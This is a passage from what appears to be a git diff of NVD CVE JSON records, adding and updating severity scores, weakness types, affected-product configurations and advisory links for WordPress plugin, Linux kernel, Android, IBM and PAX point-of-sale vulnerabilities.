through 2.1.1; Admin CSS MU: from n/a through 2.6.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-918"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/admin-css-mu/wordpress-admin-css-mu-plugin-2-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/amp-toolbox/wordpress-amp-toolbox-plugin-2-1-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/confirm-data/wordpress-confirm-data-plugin-1-0-7-unauth-server-side-request-forgery-ssrf-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/css-adder-by-agence-press/wordpress-css-adder-by-agene-press-plugin-1-5-0-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/custom-login-admin-front-end-css-with-multisite-support/wordpress-custom-login-admin-front-end-css-plugin-1-4-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/montonio-for-woocommerce/wordpress-montonio-for-woocommerce-plugin-6-0-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/phpfreechat/wordpress-phpfreechat-plugin-0-2-8-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/qards-free/wordpress-wordpress-page-builder-qards-plugin-1-0-5-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/styles/wordpress-styles-plugin-1-2-3-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/theme-minifier/wordpress-theme-minifier-plugin-2-0-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/woosupply/wordpress-woosupply-plugin-1-2-2-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/woovip/wordpress-woovip-plugin-1-4-4-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/woovirtualwallet/wordpress-woovirtualwallet-plugin-2-2-1-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/wp-amo/wordpress-amo-for-wp-plugin-4-6-6-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
},
{
"url": "https://patchstack.com/database/vulnerability/wpopal-core-features/wordpress-wpopal-core-features-plugin-1-5-7-server-side-request-forgery-ssrf?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}

10
CVE-2022/CVE-2022-428xx/CVE-2022-42889.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2022-42889",
"sourceIdentifier": "security@apache.org",
"published": "2022-10-13T13:15:10.113",
"lastModified": "2023-04-17T16:47:17.233",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.583",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -52,7 +52,6 @@
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
@ -70,7 +69,6 @@
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
@ -173,6 +171,10 @@
"VDB Entry"
]
},
{
"url": "http://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.html",
"source": "security@apache.org"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Feb/3",
"source": "security@apache.org",

55
CVE-2022/CVE-2022-450xx/CVE-2022-45083.json Normal file
View File

@ -0,0 +1,55 @@
{
"id": "CVE-2022-45083",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.247",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress.This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress: from n/a through 4.3.2.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 6.6,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.3,
"impactScore": 3.7
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-502"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-3-2-auth-php-object-injection-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}

55
CVE-2022/CVE-2022-458xx/CVE-2022-45845.json Normal file
View File

@ -0,0 +1,55 @@
{
"id": "CVE-2022-45845",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.467",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-502"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/smart-slider-3/wordpress-smart-slider-3-plugin-3-5-1-9-auth-php-object-injection-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}

55
CVE-2022/CVE-2022-471xx/CVE-2022-47160.json Normal file
View File

@ -0,0 +1,55 @@
{
"id": "CVE-2022-47160",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.777",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.\n\n"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "audit@patchstack.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "audit@patchstack.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-200"
}
]
}
],
"references": [
{
"url": "https://patchstack.com/database/vulnerability/wp-social/wordpress-wp-social-plugin-1-9-0-auth-sensitive-information-disclosure-vulnerability?_s_id=cve",
"source": "audit@patchstack.com"
}
]
}

70
CVE-2022/CVE-2022-486xx/CVE-2022-48619.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2022-48619",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-12T03:15:08.633",
"lastModified": "2024-01-12T13:47:31.250",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:27:59.073",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -14,15 +14,75 @@
"value": "Se descubri\u00f3 un problema en drivers/input/input.c en el kernel de Linux anterior a la versi\u00f3n 5.17.10. Un atacante puede provocar una denegaci\u00f3n de servicio (p\u00e1nico) porque input_set_capability maneja mal la situaci\u00f3n en la que un c\u00f3digo de evento queda fuera de un mapa de bits."
}
],
"metrics": {},
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17.10",
"matchCriteriaId": "9FD70CAF-9EE4-481A-B8B7-4245DD096325"
}
]
}
]
}
],
"references": [
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.10",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch"
]
},
{
"url": "https://github.com/torvalds/linux/commit/409353cbe9fe48f6bc196114c442b1cff05a39bc",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Patch"
]
}
]
}

6
CVE-2023/CVE-2023-20xx/CVE-2023-2007.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2023-2007",
"sourceIdentifier": "secalert@redhat.com",
"published": "2023-04-24T23:15:18.877",
"lastModified": "2023-10-20T00:15:12.483",
"lastModified": "2024-01-19T16:15:08.907",
"vulnStatus": "Undergoing Analysis",
"descriptions": [
{
@ -90,6 +90,10 @@
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html",
"source": "secalert@redhat.com"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0011/",
"source": "secalert@redhat.com"
},
{
"url": "https://www.debian.org/security/2023/dsa-5480",
"source": "secalert@redhat.com"

8
CVE-2023/CVE-2023-212xx/CVE-2023-21255.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-21255",
"sourceIdentifier": "security@android.com",
"published": "2023-07-13T00:15:24.053",
"lastModified": "2023-11-02T01:13:59.657",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.713",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -103,6 +103,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0010/",
"source": "security@android.com"
},
{
"url": "https://source.android.com/security/bulletin/2023-07-01",
"source": "security@android.com",

8
CVE-2023/CVE-2023-214xx/CVE-2023-21400.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-21400",
"sourceIdentifier": "security@android.com",
"published": "2023-07-13T00:15:24.340",
"lastModified": "2023-10-26T18:20:32.370",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.817",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -132,6 +132,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0012/",
"source": "security@android.com"
},
{
"url": "https://source.android.com/security/bulletin/pixel/2023-07-01",
"source": "security@android.com",

4
CVE-2023/CVE-2023-271xx/CVE-2023-27168.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-27168",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:12.247",
"lastModified": "2024-01-19T14:15:12.247",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

8
CVE-2023/CVE-2023-323xx/CVE-2023-32337.json
View File

@ -2,12 +2,16 @@
"id": "CVE-2023-32337",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2024-01-19T02:15:07.537",
"lastModified": "2024-01-19T02:15:07.537",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288."
},
{
"lang": "es",
"value": "IBM Maximo Spatial Asset Management 8.10 es vulnerable a server-side request forgery (SSRF). Esto puede permitir que un atacante autenticado env\u00ede solicitudes no autorizadas desde el sistema, lo que podr\u00eda provocar la enumeraci\u00f3n de la red o facilitar otros ataques. ID de IBM X-Force: 255288."
}
],
"metrics": {

8
CVE-2023/CVE-2023-380xx/CVE-2023-38003.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-38003",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T01:15:08.217",
"lastModified": "2023-12-07T15:34:59.537",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.013",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -136,6 +136,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7078681",
"source": "psirt@us.ibm.com",

8
CVE-2023/CVE-2023-387xx/CVE-2023-38727.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-38727",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T02:15:06.867",
"lastModified": "2023-12-07T17:34:50.503",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.123",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -144,6 +144,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087143",
"source": "psirt@us.ibm.com",

8
CVE-2023/CVE-2023-406xx/CVE-2023-40687.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-40687",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T02:15:07.077",
"lastModified": "2023-12-07T17:34:30.903",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.237",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -143,6 +143,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087149",
"source": "psirt@us.ibm.com",

8
CVE-2023/CVE-2023-406xx/CVE-2023-40692.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-40692",
"sourceIdentifier": "psirt@us.ibm.com",
"published": "2023-12-04T00:15:07.000",
"lastModified": "2023-12-07T15:29:41.200",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:09.330",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -136,6 +136,10 @@
"Vendor Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0001/",
"source": "psirt@us.ibm.com"
},
{
"url": "https://www.ibm.com/support/pages/node/7087157",
"source": "psirt@us.ibm.com",

113
CVE-2023/CVE-2023-421xx/CVE-2023-42134.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-42134",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.190",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:14:39.460",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "PHYSICAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,93 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_v11.1.45_20230314",
"matchCriteriaId": "EEE64397-E23F-4601-A869-7CF855EFB5C2"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_v11.1.45_20230314",
"matchCriteriaId": "EEE64397-E23F-4601-A869-7CF855EFB5C2"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}

113
CVE-2023/CVE-2023-421xx/CVE-2023-42135.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-42135",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.413",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:47:29.607",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "PHYSICAL",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,93 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
}
],
"references": [
{
"url": "https://blog.stmcyber.com/pax-pos-cves-2023/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://cert.pl/posts/2024/01/CVE-2023-4818/",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://ppn.paxengine.com/release/development",
"source": "cvd@cert.pl"
"source": "cvd@cert.pl",
"tags": [
"Permissions Required"
]
}
]
}

281
CVE-2023/CVE-2023-421xx/CVE-2023-42136.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2023-42136",
"sourceIdentifier": "cvd@cert.pl",
"published": "2024-01-15T14:15:24.670",
"lastModified": "2024-01-16T13:56:05.467",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T16:19:25.047",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -16,6 +16,26 @@
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -39,6 +59,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
},
{
"source": "cvd@cert.pl",
"type": "Secondary",
@ -50,22 +80,261 @@
]
}
],
"configurations": [
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a6650:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C020172-6E0C-4265-B4C9-ED93C84FE8AA"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFCD5218-5AA0-4086-926C-3EAEE1E43136"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a77:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0390BD9D-1FF7-456E-9394-34F009DE82CF"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*",
"versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614",
"matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8"
}
]
},
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": false,
"criteria": "cpe:2.3:h:paxtechnology:a920_max:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8612B592-DFE4-4B66-B24D-71EEA747FAA2"
}
]
}
]
},
{
"operator": "AND",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
